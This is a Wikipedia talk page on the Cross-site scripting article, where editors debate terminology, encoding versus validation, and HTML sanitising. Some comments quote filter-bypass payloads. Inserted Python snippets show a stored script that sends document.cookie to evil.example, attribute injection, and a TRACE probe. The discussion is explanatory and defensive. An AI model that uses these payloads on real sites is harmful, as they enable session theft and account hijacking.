Talk:Cross-site scripting


Tiny NVD Images

Is there any need for the tiny images of each of the three types of vulnerability on the NVD? The images are impossible to see without opening the full versions of them, and they add nothing to the article. I'm going to remove the images. If anyone disagrees they can revert and tell me why. Also, I believe the exploit scenarios should be merged into the descriptions of each type of attack, but I will not do that right now. --WikiSolved (talk) 18:41, 25 June 2009 (UTC)

Exploit scenarios

CLARIFICATION NEEDED ON Type-0 attack: In this section under the subsection Type-0 attack bullet #3 it says, "The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer." There is no explanation of how the vulnerable HTML page got installed locally on Alice's computer or how Mallory knew about it. This is the crux of this attack, so without this part of the explanation the scenario is not useful. I haven't found an answer to this or I would have corrected the article. I'm hoping someone else who has more knowledge of this attack will read this and add the clarifying information.

I added a short blurb that reads "(Local HTML pages are commonly installed with standard software packages, including Internet Explorer.)" Does that clear it up a bit? TDM 13:53, 15 November 2007 (UTC)


The first paragraph in the section "Other forms of mitigation" is garbage. Just quoting text will not stop it from being interpreted as html. I can always put "> into the text to close the tag. That whole section should be either removed or heavily modified. It is naive and inaccurate. -- 15:06, 4 April 2006 (UTC)

The use of the word "quoting" in the entire article is very ambiguous, which is why Mr misunderstood the article. We should take the time to clarify - "quoting" should be replaced with "encoding". --Blaufish 19:46, 3 May 2006 (UTC)
Indeed, many people are very confused by "quoting" in HTML. I believe this is the official terminology for encoding HTML special characters, and this was mentioned at the beginning of the "Avoiding XSS vulnerabilities" section. However, for casual readers who don't read that section and aren't familiar with the term in this context, it would probably be best to use "encode" or "encoding" more often. -- TDM 05:07, 28 May 2006 (UTC)
I agree... "HTML quoting" made absolutely no sense to me, and information about what that means is not easily available. Google searches for "HTML quoting means," "what is HTML quoting," "what does HTML quoting," and the ever-popular define:"HTML quoting" all yield no results. And there is no Wikipedia entry for "HTML quoting." If it is the official terminology there should probably be a wiki article about it, as I'm still uncertain what other people think it is (or what its common usage is). "Encoding" seems better to me. —Preceding unsigned comment added by (talk) 18:17, 21 June 2006

Is XSS in itself a vulnerability?

"Cross-site scripting (XSS) is a type of computer security vulnerability [...] XSS enables attackers to inject client-side script into Web pages". Is this correct in the first place??? I think the term Cross Site Scripting in itself only describes a page on one site containing a script hosted on another site (or is it having a script hosted on a site sending/loading data to/from another site? Not sure), which may or may not imply a vulnerability. I think what is described in this article is a particular use (or abuse) of XSS. Perhaps it should be called "XSS Injection", or something like that?

Or am I wrong? Teo8976 (talk) 21:24, 26 January 2015 (UTC)

No, not wrong at all; perhaps an artifact of authorship... but pretty obviously not correct. Perhaps changing the first paragraph on the page and the first paragraph of the first section would allow the page to remain as it is (tone-wise) while ensuring the information contained therein doesn't color its referential quality. idfubar (talk) 14:29, 4 August 2015 (UTC)

Avoiding XSS Scripting: blacklisting vs. whitelisting

There should be some mention of the two different approaches -- blacklisting (i.e., removing anything that can be recognised as a potential script injection) and whitelisting (i.e., only allowing stuff that can be determined not to be a potential script injection). If I had references for this kind of stuff, I'd add it myself, but I came here looking for them. :( JulesH 17:10, 27 July 2006 (UTC)

This "avoiding" section is written from a programmer's point of view. How do users avoid these problems? Justforasecond 14:55, 31 July 2006 (UTC)
True, it is written from a programmer's perspective, which is most relevant. Users can do very little to avoid such attacks, but perhaps a few things should be mentioned. All I can think of from the users' side is disabling scripting in browsers (usually unworkable), and avoiding trusting links sent to them via email. --TDM 13:28, 8 August 2006 (UTC)
Or NoScript for Firefox ^.^ 09:34, 28 March 2007 (UTC)
I haven't personally used NoScript, but it may be a good mitigation. If you add something about it, be sure to link off to something that describes how it works. TDM 13:49, 15 November 2007 (UTC)
About "since it blocks bad sites only after...": what is a "bad site"? It may be understood as the site of the bad guys, while it is probably one of many "badly" programmed sites.
About "Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effective.": it requires at least some references. The examples of "persistent" and non-persistent "attack" show that there is only one site in the picture (Bob's website). This site supposedly deserved trust. To protect against the example attacks, the user has to disable scripts on Bob's website (supposedly the "good" site). Tousavelo (talk) 14:41, 17 August 2008 (UTC)


I like the recent example of PayPal's XSS hole. However, it isn't mentioned what type it is. Is it a type 1 XSS? If so, we can probably remove the ATutor example, since it isn't very well known, and replace it with the PayPal one. We should also keep the number of examples down to 4-5 if possible. It could easily grow to 1000 if everyone put their favorite in, but we don't need that. --TDM 13:32, 8 August 2006 (UTC)

No one has responded to this, so I went ahead and ripped out several half-complete examples. It seems this section is becoming a bulletin board for script kiddies to advertise. Honestly, people... XSS holes are a dime a dozen. Posting them to popular security mailing lists is more than enough to get your name out there. I did remove the ATutor example and improved some others, but some still don't list what type of XSS they are. If those who posted them could describe them a bit more, that would make this section more consistent and complete. TDM 22:51, 26 October 2006 (UTC)
One school-example of XSS would clear up a lot of things. —Preceding unsigned comment added by Whendrik (talkcontribs) 07:43, 7 November 2009 (UTC)


Someone added the notice recently that this page may not meet Wikipedia's standards due to the need for restructuring. Could whoever added that elaborate? I don't see any new comments here specific to that evaluation. If there's some other organization that would work better, I'd be willing to improve the document. TDM 23:57, 19 October 2006 (UTC)

Guilty as charged. I should have added a note with some suggestions. Firstly, I found the article confusing and difficult to read, despite having a 15-year background as a systems software engineer. Specifically, the article does not _begin_ with a clear definition of cross-site scripting. Secondly, the sections characterising the types of cross-site scripting are hard to read. I would suggest that in a sense the article could be considered as "written backwards" in that the _examples_ given just after the "types" section show the clearest writing, and are the nearest thing the article has to a clear _definition_. Consider moving these to the front of the article since a "definition by example" would be an improvement. So "restructuring" the article could mean trying to move things around into a more logical order so that things are clearly defined _before_ they are referenced. And if clear definitions are not easily obtainable, perhaps because of lack of consensus, then definition-by-exemplification is definitely the way to go. CecilWard 10:20, 20 October 2006 (UTC)
I have expanded the first paragraph's description and re-ordered the first two sections, which will hopefully help a bit. I don't have time to rewrite the types at the moment, but I did try to clean up the real world examples a bit. I agree that an example early in the article will help those who don't have a clear grasp of all of the background material, but I think it should be relatively short and as simple as possible. When I originally put most of the text together, I wanted to be sure to put the vulnerability in the context of the same-origin policy, otherwise the technical reason why XSS is even a vulnerability at all may be difficult to understand. Because of the order in which things are referenced (e.g. "XSS" abbreviation), a major reordering would require a lot of rewriting as well. However, I agree that the long background section, coupled with the terminology section, makes for a long read before casual readers get to any solidifying examples. Thanks for the feedback. TDM 22:48, 26 October 2006 (UTC)
The issue pointed out by CecilWard regarding how the article begins appears to still be at issue (ten years later) and should probably be addressed by way of a different introductory paragraph (i.e. different sentences in the first paragraph of the first two sections) and was mentioned in another section of the Talk page as well... — Preceding unsigned comment added by Idfubar (talkcontribs) 14:34, 4 August 2015 (UTC)

Link to HTML Purifier

I'd like to add a link to HTML Purifier in the Prevention section, as it implements the most reliable method: parsing and stripping all tags/attributes not in the whitelist (as well as other protection). Unfortunately, I wrote the library, so if I put it on, it's vanity. So could someone take a look and, if it looks useful, add the link for me? Thanks! — Edward Z. Yang(Talk) 23:36, 29 November 2006 (UTC)

A bit quiet around here hmm... I'll wait another week. — Edward Z. Yang(Talk) 02:37, 2 December 2006 (UTC)
In my not-so-humble opinion, stripping tags is never the most reliable method. HTML entity encoding is likely the only safe method. Sure, you can develop a complex stripping system that is designed only to allow good things through, and this might work most of the time, but browsers are just too inconsistent for this to let many sleep well at night. I don't care if you link to it, but don't change the text saying it is the best way to go or anything like that. TDM 17:32, 23 January 2007 (UTC)
The article already has text in "Avoiding XSS vulnerabilities" that states: "The most reliable method is for web applications to parse the HTML, strip tags and attributes that do not appear in a whitelist, and output valid HTML." (Which I did not add to the article). It probably is POV, but I think it's correct (we'll need to find a citation for it, then). Making a complex stripping system is not impossible: as HTML Purifier demonstrates, it has been done.
Browser inconsistency is a trickier issue, but I believe that it too poses no problem as long as you enforce standards-compliant code. Browsers begin to have wildly differing interpretations of HTML when it's ambiguous, when you have things like <IMG src="" style"="style="a /onerror=alert(String.fromCharCode(88,83,83))//" >`> . If you get rid of this craziness and enforce well-formed XHTML, you're gold. (Just don't allow comments). — Edward Z. Yang(Talk) 04:34, 25 January 2007 (UTC)
I still don't agree with you Edward, sorry. I did not put that text there that you quoted, and I think it's definitely a PoV. The problem is not with HTML itself, in all of its incarnations. You can certainly write a reliable stripper that guarantees properly-formed HTML is not injected. But what you can't guarantee is that a browser won't interpret broken tags as proper tags. An attack which used to work against hotmail was: <ifra<iframe >me src="">. Of course hotmail would strip the inner, properly formatted iframe, but it wouldn't make a second pass and remove the outer one, which became properly formatted after the first was stripped. Another blunder by Microsoft was with their magical .NET 2.0 tag checking. Here, they look for "evil" things and reject them when they find them. However their algorithms didn't even match what IE interprets as valid tags. The attack that worked was <\x01script ...> (where "\x01" should be interpreted as the literal 01 byte). This fooled the "evil" searching algorithm while IE happily ignored the weird byte and used the tag. You have to completely understand the parsing algorithms of 3-4 browsers for 3-4 versions back before you can reliably create a tag stripper that I'll trust. Others feel the same way about this. TDM 13:48, 15 November 2007 (UTC)
if you find <iframe> in the first pass you could simply discard the whole input; if you find <iframe> again in a second pass, you *know* that someone tried to play smart and you can file a case... ;) the problem is that computers can be safe, but programmers aren't :>
I just don't agree that any kind of HTML parsing algorithm will do it right in all cases given the current state of HTML. It is fine to mention that this approach is used and is one option, but it is *FAR* from the safest approach. Have you taken into account things like UTF-7 encodings while you're doing this parsing? Outright rejecting any input that looks like it contains tags is much better than trying to sanitize input, but it's still going to be far from perfect. In my work as a penetration tester, I've exploited hundreds of pages that try to use similar techniques. It's just too hard to get it right for all browsers under all HTML and encoding variants. TDM (talk) 19:45, 17 April 2008 (UTC)
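The hotmail-style bypass TDM describes can be reproduced with a toy single-pass filter. This is a hypothetical reconstruction of the flaw, not Hotmail's actual code:

```python
import re

# A naive single-pass filter of the kind discussed above: delete anything
# that parses as an <iframe ...> tag, in exactly one pass over the input.
def strip_iframes_once(markup):
    return re.sub(r'<iframe[^>]*>', '', markup, flags=re.IGNORECASE)

# Stripping the well-formed inner tag splices the surrounding fragments
# into a brand-new, well-formed <iframe> that the filter never sees.
payload = '<ifra<iframe >me src="http://evil.example/">'
filtered = strip_iframes_once(payload)

print(filtered)
# <iframe src="http://evil.example/">
```

Running the filter to a fixed point, or rejecting any input that matches at all, closes this particular hole, which is the point the reply above is making; the deeper objection is that browsers also accept tags the filter's grammar never anticipated.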

Vulnerability example/demonstration

I'm not familiar enough with this article to know exactly where this should go, but I think this presentation of a Google Desktop vulnerability is extremely educational - they show how such small vulnerabilities in this case end up cascading into complete control over the victim's computer. The vulnerabilities they use are all patched (I think including one glitch that's server-side), so they no longer work, so it should be safe to show. This sounds like Type 2 in the article. —AySz88\^-^ 20:39, 22 February 2007 (UTC)

That looks like a good resource. I wouldn't have a problem with its addition. Is there a plain-text version, though? — Edward Z. Yang(Talk) 00:38, 25 February 2007 (UTC)

XSS v CSS

I was almost certain we'd previously had a discussion on this, but obviously this is not the case. So, I'll bring it to the floor now.

I am strongly opposed to including the acronym "CSS" in the introduction paragraph of the article. It is a misleading term that no one uses anymore, as the Terminology section already states, and thus, while deserving mention in that segment, should not be in the intro. — Edward Z. Yang(Talk) 22:42, 28 February 2007 (UTC)

It is true that most people (especially in the security community) today no longer use "CSS" to refer to cross-site scripting, since this acronym can refer to another technology. Nevertheless, AFAIK, a few existing articles (including some more recent ones) on the Internet still use this acronym, or use both acronyms simultaneously to refer to cross-site scripting (examples for using both: [1] and [2]). While we should certainly discuss the more appropriate or preferred term in the main article (e.g. in the Terminology section), it seems better that other terms are also mentioned in the intro as long as they are still used by some people or can be commonly found. Or, we can change/rephrase the intro statement a bit to make it more clear. -- 08:16, 1 March 2007 (UTC)
I can see where you're coming from. Maybe we could bump it to the end of the intro paragraph. — Edward Z. Yang(Talk) 22:27, 1 March 2007 (UTC)
It seems good. -- 01:38, 2 March 2007 (UTC)

This article is very well written

It's well-structured, concise, disambiguating, sufficiently detailed, and very clear. 22:24, 6 April 2007 (UTC)

Disagree. The "Persistent" section is stupid. One, Mallory is a girl's name. Two, hackers do not watch football. Three, hackers would not use a dating website to find mates, if a hacker needed a mate they would use IRC or a relatively unknown underground chat program. Four, a hacker would use a girl's name for the purpose of elite deception. With this level of incongruity to reality, you might as well talk about Batman and Lex Luthor battling demons in space. — Preceding unsigned comment added by (talk) 15:47, 16 June 2011 (UTC)

There's also a singing group

called XSS. I don't know how to do disambiguation pages, and I'm not an expert on XSS (that's why I was looking them up), but maybe someone can help clarify this? All I know about XSS is that they sing sort of hip-hop style R&B in English, and that they're at least popular in the Middle East.

I believe that there has been an XSS disambiguation page created now that you could add to. TDM (talk) 19:46, 17 April 2008 (UTC)

The Reason For Wiki Formatting?

Are XSS and the difficulty with interpreting and reformatting HTML some of the reasons why wikis don't use HTML for formatting? I know that one reason for not using HTML is that it might be difficult for some wiki users to learn. But it seems that the wiki formatting also helps prevent XSS while giving the users some control. --Lance E Sloan 16:57, 8 August 2007 (UTC)

Yes, wikis use alternate formatting languages largely due to XSS. If they allowed raw HTML, it would be trivial to hijack anyone else's account and post on their behalf in most cases. Obviously alternate languages can be easier for non-programmers to learn, but I think this is the main reason. Keep in mind, the use of an alternate language does not prevent XSS alone. It must be very carefully implemented. I've seen bulletin board posting languages which allowed injection through attribute parameters. In the language I was testing, one would specify something like: [link url="http://..."]text[endlink] to produce <a href="http://...">text</a>. However, if you supplied "" as the URL, the page would render as <a href="">">text</a>, indicating an obvious injection. TDM 13:40, 15 November 2007 (UTC)
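The attribute-injection flaw TDM describes can be sketched as follows. The render_link function is a hypothetical reconstruction of the vulnerable translator, and the payload is a stand-in, since the actual URL value was elided in the comment above:

```python
# Hypothetical reconstruction of the bulletin-board flaw described above:
# the url parameter is substituted into the <a> template without encoding.
def render_link(url, text):
    return '<a href="%s">%s</a>' % (url, text)

# A "URL" containing '">' closes the href attribute and the tag early,
# so the remainder of the value lands in raw HTML context.
evil_url = '"><script>alert(1)</script>'
rendered = render_link(evil_url, 'text')

print(rendered)
# <a href=""><script>alert(1)</script>">text</a>
```

The fix is the same as elsewhere in this discussion: entity-encode the parameter value before substituting it into the attribute.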

Maybe the wrong place, but...

I have been getting strange XSS warnings in FF from Wikipedia articles with images lately. Does anyone know if there has been a change in the template formatting of images or if it's a FF bug?

vulnerability or attack?

isn't cross site scripting really an attack and not a vulnerability? the vulnerability is most clearly input validation. the attack is script injection, of which cross site scripting is a specific type of injection. do we agree? —Preceding unsigned comment added by (talk) 19:32, 5 September 2007 (UTC)

Well, I would agree that cross-site scripting could be used to refer to an attack. However, there is a vulnerability at the core of it which allows the attack to succeed. I strongly disagree with the assertion that it's an "input validation" flaw, because the real problem is output encoding. These are very different issues, even though people tend to lump them together. What if you want your application to handle nearly any kind of input (free-form text field with multiple languages/character sets) but don't want it to be vulnerable? You can't validate the input carefully (and prevent HTML special characters from getting in there), but you *can* encode the output. It's an injection flaw, whose correct fix is to treat special characters as literals. Yes, you can use validation up-front in 95% of the cases to mitigate the problem, and you *should* do this, since input validation can mitigate other types of vulnerabilities as well, but it is just a mitigation. TDM 13:31, 15 November 2007 (UTC)
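TDM's distinction can be illustrated with Python's stdlib html.escape: the sample comment below is made-up free-form text that a strict input validator would have to reject (it legitimately contains <, &, quotes, and non-ASCII), yet output-time encoding renders it harmlessly:

```python
import html

# Legitimate free-form input containing HTML special characters.
comment = 'I <3 "café" & naïve math: 1 < 2'

def render_comment(text):
    # Encode at output time: special characters become literal text,
    # so no validation rule has to guess what input is "allowed".
    return '<p>%s</p>' % html.escape(text)

rendered = render_comment(comment)
print(rendered)
# <p>I &lt;3 &quot;café&quot; &amp; naïve math: 1 &lt; 2</p>
```

The same render_comment call neutralises hostile input too, which is why the comment above treats encoding as the fix and validation as a defence-in-depth mitigation.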

Passive Aggressive Page Tagging

When you tag the page as "needs cleanup", "needs citations", "needs an expert", or whatever, please include a description here of the specific criticisms. I consider myself an expert on this topic and have written most of the content for the page. However, I'm a busy guy and only have time to look at the page once every few months. I certainly don't have time to read up on every Wikipedia policy regarding format, so please describe your gripes rather than just doing a hit-and-run tag like that. I can guess the citations issue could be resolved by adding inline external links or footnote tags. Certainly there are plenty (too many) of external resources listed at the bottom that could be better referenced internally to back up the page's assertions. However, the "needs an expert" tag confuses me. TDM (talk) 19:55, 17 April 2008 (UTC)

Hello, TDM. I will remove the expert tag. Just happened to see your note. I am not an expert on the topic but would be happy to help do the citations. —SusanLesch (talk) 15:19, 11 May 2008 (UTC)
Hi SusanLesch. Thanks for responding. I know the article lacks direct citations of several assertions. If you see statements that could use backing up, feel free to insert the little "needs citation" marks on the specific sentences. Sometimes it's hard when you're knee deep in this stuff to realize that certain things, which seem obvious, need backing up with references. I can then try to track down some references for those specific items. TDM (talk) 17:56, 23 May 2008 (UTC)
One para is now cited, using your text as a framework. Barring unforeseen circumstances, which are possible, I figure if a person can learn JavaScript in 24 hours I might have what I can do done in five to seven days. If you are available then to make corrections for all the errors I introduce, that would be great. If anyone else is available and interested we could be done in half that time, with luck. —SusanLesch (talk) 17:25, 27 May 2008 (UTC)
Citing is done except for one, which is marked. I removed my cartoons, the Python section and the lists mentioned below. OK from my point of view to throw out all the computers and start over. Only half kidding. Thank you, TDM. —SusanLesch (talk) 12:15, 8 June 2008 (UTC)
Is there any reason to retain the "cleanup" tag, especially since there's no reason specified? This is a really excellent article. I'm not an expert by any means but I know enough about the subject and Wikipedia style to see that there's very little to do here. Maybe whoever objects could put a few inline notices like "citation needed", because it's totally unclear to me where the cleanup needs to happen. Does anyone else support removing the misleading tag? Phette23 (talk) 23:10, 23 February 2013 (UTC)
I support removing the tag. I don't see any justification for it. I have removed the tag. I have restored the article's B rating. —Kvng 15:57, 24 February 2013 (UTC)

Avoiding/Prevention Rewrite

I think this section is currently pretty weak. For one, the Python example can probably go away, since it isn't an ideal filter. Perhaps it would be better to start with a more abstract description of how to do white-list based character encoding (i.e., all characters except those in a white list get encoded), then move on to some algorithms or examples of libraries that already do this. Finally, I think it's important to include a note on defining a page's character set to prevent UTF-7 based attacks. There are very few good references online for this... mostly just specific vulnerabilities and associated exploits. I might get around to this rewrite at some point, but feel free to give it a go if anyone is interested. TDM (talk) 18:01, 23 May 2008 (UTC)


Hi. The "External links" section had been tagged since last November, so I removed it except for a couple. In case anyone needs them, here they all are. —SusanLesch (talk) 17:46, 28 May 2008 (UTC)

The other list was real-world examples, which are all here and now summarized in one paragraph under "Background". If anyone thinks that a list makes sense, it is OK from my point of view to restore it. —SusanLesch (talk) 02:31, 29 May 2008 (UTC)


From the Mitigation section, this was cut only because OpenAjax recommends iframe and I don't know how to reconcile the two thoughts. Maybe someone else would be able to restore this sentence if it needs to be there. Thanks. —SusanLesch (talk) 06:10, 9 June 2008 (UTC)

"Unfortunately external content can still be loaded into the page with elements like iframe or object to trick users.[1]"


  1. ^ How can I avoid the problem?, in "Frequently Asked Questions About Malicious Web Scripts Redirected by Web Sites". CERT Coordination Center, Carnegie Mellon University. December 7, 2004. Retrieved 2008-06-04.


Shouldn't specific tactics be listed? For example, a server which supports HTTP TRACE (or is accessed via such a proxy server[3]) is probably vulnerable to XST (cross-site tracing)[4]. --Jesdisciple (talk) 23:35, 1 October 2008 (UTC)
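For reference, an XST probe boils down to sending a TRACE request and seeing whether the server echoes it back. A minimal sketch that only builds the raw request (the host is a placeholder; actually sending it is left out):

```python
# Sketch of an XST probe: TRACE asks the server to echo the request back
# in a message/http body, which is what lets injected script read headers
# such as Cookie. This only constructs the raw request text.
def build_trace_request(host):
    return ('TRACE / HTTP/1.1\r\n'
            'Host: %s\r\n'
            'Connection: close\r\n\r\n' % host)

raw = build_trace_request('example.com')
print(raw)
# A 200 response echoing this request back suggests TRACE is enabled;
# a 405 Method Not Allowed means it is disabled.
```

Disabling TRACE server-side (or on intermediate proxies) is the usual mitigation, independent of any XSS fixes in the application itself.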

Type 1 - missing the point

Due to the general requirement of the use of some social engineering in this case (and normally in Type 0 vulnerabilities as well), many programmers have disregarded these holes as not terribly important. This misconception is sometimes applied to XSS holes in general (even though this is only one type of XSS) and there is often disagreement in the security community as to the importance of cross-site scripting vulnerabilities.

This section misses the entire point. If I wanted to grab cookies from users using some form of local JavaScript exploit (just an example, there are hundreds of other things possible), I could use a type 1 vulnerability on a forum or popular website in order to attack the maximum number of users. The social engineering side of it is therefore a side-note, as it only applies when an attacker is targeting one specific user - and even then if they know they frequent that site they don't have to social engineer them at all.

Furthermore, what's with the names in the exploit scenarios? I'm all for equality but I'd like to see names in there that are at least somewhat universally pronounceable and single-barrelled. Try something like Anne instead of Lorenzo de Medici. (talk) 10:58, 5 October 2008 (UTC)

Even more importantly, the names Alice, Bob, and Mallory are technical terms within the computer security world and should be preserved in this article. Reverted. (talk) 19:28, 28 October 2008 (UTC)
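The mass cookie-theft scenario described in this section usually rides on a one-line stored payload like the following sketch. The collection host "evil.example" is a placeholder, not a real endpoint:

```python
# The kind of stored payload the section above alludes to: saved once in
# a forum post on a vulnerable site, it runs in every visitor's browser
# and ships document.cookie to an attacker-controlled host.
payload = ('<script>'
           "new Image().src='http://evil.example/steal?c='"
           '+encodeURIComponent(document.cookie);'
           '</script>')

# No per-victim social engineering is needed: everyone who merely views
# the page executes the script under the vulnerable site's origin.
print(payload)
```

This is why stored (type 2) XSS on a popular page scales to many victims, while reflected attacks typically need a lure such as a crafted link.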

Frequency of sites that require JavaScript?

In the section "Eliminating scripts", our article says:

Another drawback is that most sites do not work without client-side scripting, forcing users to disable protection for that site and opening their systems to the threat

I just added a {{dubious}} tag because I frankly don't think it is true, and the citation given doesn't support the claim! The supporting cite is:

73% of sites relied on JavaScript in late 2006, in {{cite news|title='Most websites' failing disabled|url=|publisher=BBC News|date=[[December 6]], [[2006]]|accessdate=2008-06-04}}

However, the quote in the BBC article does not claim that 73% of websites rely on JavaScript, it says that "A further 73% failed to make the grade because of their reliance on JavaScript for some of the website's functionality." (My emphasis.) The difference is subtle but critical; if I say in an unqualified way that "mechanism A relies on B", it will be understood to mean that without B, A doesn't work at all. However if we say that "mechanism A relies on B for some functions", then clearly A still works without B.

I think that this weaker claim is perfectly plausible -- but also highly misleading, because in many cases, the lost functionality is inconsequential, or even annoying. I have been using NoScript for nearly three years now, and while it is probably true that only 27% of websites make no use of JavaScript whatsoever, it certainly is not true that the other 73% all require it in order to work. I am a net junky, but I have only 11 sites whitelisted (apart from the defaults); all the scores of other things I do on the net just don't need it. In fact, my subjective impression is that overwhelmingly the most common usage of JavaScript is for randomisation of ad loading; so on those sites, disabling scripts does nothing but speed up page loading and reduce clutter. The next most common usage would be form validation -- the absence of which you will generally not even notice (especially as all the most common types of data entry errors aren't detected by client side scripts anyway.) I don't know what fraction of websites critically depend on JavaScript in order to work at all (if I knew, I'd just edit the article), but it's nothing like 73%. -- Securiger (talk) 05:36, 8 October 2008 (UTC)

Non-technical explanation?

Is there any scope in this article for a non-technical explanation? What does "injecting" scripts mean? Can it be explained in non-technical language? I would request a short section with a "non-technical explanation". (Or has this issue been dealt with somewhere? The need, or not, of providing non-technical explanations...) Devadaru (talk) 16:33, 23 January 2009 (UTC)

The page was just revised and due to the (albeit minor) grammatical changes it could very well be the case that the page reads more accessibly to a non-technical audience - perhaps another pass over its content would be appropriate? idfubar (talk) 21:20, 5 August 2015 (UTC)

List of Prominent Domains

The list of prominent domains hacked seems like it's promoting XSS hackers' glory. I don't think the New Zealand Herald, for example, or an Obama discussion forum, are nearly as prominent as Google or Yahoo. Maybe we could cull the list down to 4 or 5. —Preceding unsigned comment added by (talk) 16:51, 5 March 2009 (UTC)

no reference to non-harmful xss

Sometimes one would like to use XSS explicitly to let different apps communicate. HTML5 (IE8, FF3) supports window.postMessage, which is said to support cross-site messaging. I think there should be a reference to all that stuff in the article. (talk) 14:06, 17 December 2009 (UTC)

Perhaps a rewrite of the first two sentences of the first two sections would address the same? idfubar (talk) 17:47, 5 August 2015 (UTC)

How to list?

In April 2010 an XSS vulnerability in JIRA was the stepping stone to the compromise of key Apache Software Foundation servers [1]. The method used in this XSS doesn't seem to match any of the ones in the article. --Walter Görlitz (talk) 22:36, 7 May 2010 (UTC)

Why do you need to "list" this in the article? I don't see much value there for explaining what XSS is.
It was most likely a reflected XSS vulnerability, because the admin was sent a tinyurl address, that redirected back to Apache's JIRA with a crafted URL. -- intgr [talk] 21:36, 8 May 2010 (UTC)


  1. ^ Ryan Naraine (2010-04-13). "Apache Foundation Hit by Targeted XSS Attack". Retrieved 2010-05-07.

Persistent vs. Non-persistent Example[edit]

The example at the end of the non-persistent section is actually a persistent attack. It is confusing. —Preceding unsigned comment added by (talk) 17:35, 5 May 2011 (UTC)Reply[reply]

The overall quality of current article is poor and need a rewrite[edit]

I see three major problems of the current article:

1. Although I am not a native English speaker, I am sure the author of the major part of this article is not a native English speaker either. More importantly, he/she has not produced a wiki-quality article in English. Examples: none in particular; just read through the article and you will get a feel for it.

2. The technical terms used in this article are non-standardized and even not consistent within the article itself. Some examples:

- “Cross-site scripting holes are web-application vulnerabilities”, “In recent years, cross-site scripting flaws”

- “Besides content filtering”

What is “content filtering”? I actually understand what it means, but why not just use the terms that have been used in previous sections, such as “output encoding” or “input validation”? This article is full of such inconsistent terminology.

3. The article has quite a lot of technical errors. Examples:

- The section about DOM based XSS is essentially wrong.

The author should read the OWASP link carefully and discuss it with a domain expert to make sure he really understands DOM-based XSS before writing the section.

- “Safely validating untrusted HTML input”

This section itself is right but misleading. ALL input data from users, the network, or any other untrusted source should be validated, not only HTML input.
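To make that point concrete, here is a minimal allowlist-validation sketch in Python. The field name and format rule are hypothetical; the idea is that a value is accepted only when it matches the format the application expects, regardless of its source (form field, URL parameter, HTTP header, cookie).

```python
import re

# Hypothetical allowlist rule: usernames are 3-20 word characters.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,20}")

def is_valid_username(value: str) -> bool:
    """Accept only values matching the expected format; reject everything else."""
    return USERNAME_RE.fullmatch(value) is not None

assert is_valid_username("alice_01")
assert not is_valid_username("<script>alert(1)</script>")
```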

- “Some companies offer a periodic scan service, essentially simulating an attack from their server to a client's in order to check if the attack is successful”

Just one attack? No. A security scanning / assessment service generally tries all kinds of possible attack types and vectors, not just “an attack”.

- “There are several different escaping schemes … including HTML entity encoding, JavaScript escaping, CSS escaping, and URL (or percent) encoding”

This sentence is missing the word “etc.” at the end of the list. There are more encoding schemes for XSS prevention besides the four listed.
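For reference, the escaping schemes the quoted sentence lists map onto standard-library calls in many languages. A Python sketch (the sample string is arbitrary):

```python
import html
import json
from urllib.parse import quote

untrusted = '";alert(1)//<script>'

# HTML entity encoding - for untrusted data in HTML element content.
html_safe = html.escape(untrusted)
# URL (percent) encoding - for untrusted data inside a URL component.
url_safe = quote(untrusted, safe="")
# JavaScript string escaping - json.dumps yields a quoted, escaped literal,
# but note it leaves '<' alone, so script contexts still need extra care.
js_safe = json.dumps(untrusted)

assert html_safe == "&quot;;alert(1)//&lt;script&gt;"
assert "<" not in url_safe and '"' not in url_safe
assert js_safe.startswith('"\\"')  # the embedded quote is escaped
```

The last point is one reason encoding is described as both straightforward and tricky: each output context (HTML body, attribute, URL, script block) needs the encoding scheme that matches it.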

- “Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner.”

- “Encoding can be tricky”

The two statements above contradict each other. Is encoding (escaping) fairly straightforward, or is it tricky?

- “When Bob reads the message, Mallory's XSS steals Bob's cookie.”

No. It is not Mallory’s XSS; it is the web site’s XSS vulnerability, and it is the script code injected by Mallory that steals Bob’s cookie. The wording here is too casual and too loose for a wiki article.

- “External links” section, the link “Simple XSS explanation”

Why is that link there? It points to a very poor-quality paper - it is far from a qualified reference for a wiki page.

- Etc.

In summary, I suggest a total rewrite of the whole article - the OWASP page could be a good reference.

Condor Lee (talk) 22:03, 5 June 2012 (UTC) Condor LeeReply[reply]

__SOME__ browsers?[edit]


 Some browsers or browser plugins can be configured to disable client-side scripts

I've never seen a browser that cannot disable JavaScript. If no one can name a browser that cannot disable scripts, I will change that statement. (I'm NOT talking about plugin/integrated browsers - I can mention one right now: Valve's Steam's integrated browser.) All mainstream browsers, including Opera, Firefox, Internet Explorer, and Safari, allow this. Divinity76 (talk) 12:02, 27 June 2012 (UTC)Reply[reply]

IE on Windows Phone 8 does not allow disabling Javascript. — Preceding unsigned comment added by (talk) 03:25, 16 October 2014 (UTC)Reply[reply]

Is XSS a vulnerability?[edit]

I wonder whether we confuse the term "XSS" with the term "XSS vulnerability" (or "XSS attacks", or "XSS-based attacks", etc.) in this article.

Are "XSS" and "XSS vulnerability" really the same?

Michael V. Antosha (mivael) (talk) 07:05, 11 October 2012 (UTC)Reply[reply]

Yes, the terminology is confused by the article's present state and the two terms "XSS" and "XSS vulnerability" do not mean the same thing... though the point was mentioned previously (under the 'Restructuring' section)... idfubar (talk) 14:47, 4 August 2015 (UTC)Reply[reply]

Include client-side filtering?[edit]

Should there be a section in Prevention about client-side filters such as XSS Auditor (Chrome) and NoScript (Firefox)? NoScript is mentioned for its ability to block all scripting, but it also includes a specific and advanced XSS filter, even if you enable JavaScript. XSS Auditor is less comprehensive (it has to be - it's targeting all Chrome users, instead of a security-minded subset of Firefox users), but it's significant. Carl.antuar (talk) 06:15, 5 March 2014 (UTC)Reply[reply]

Sounds good to me. In general, WP:BOLD -- intgr [talk] 12:49, 6 March 2014 (UTC)Reply[reply]

Surprising that foreign scripts ARE allowed at all.[edit]

Just an observation, but in view of the fact that pages cannot access cross-site cookies, I was quite surprised - and indeed alarmed - to see that the same does not apply to JavaScript. If script URLs could only be local files or URLs of the same root domain as the hosting page, that would nail all of the exploits bar the inline scripting ones, which are limited in scope without a foreign script to call. The existing situation seems to be a classic example of feature bloat taking precedence over security. Though, I daresay a change now would break a lot of existing sites that rely on foreign scripts, for example jQuery being loaded from Google.

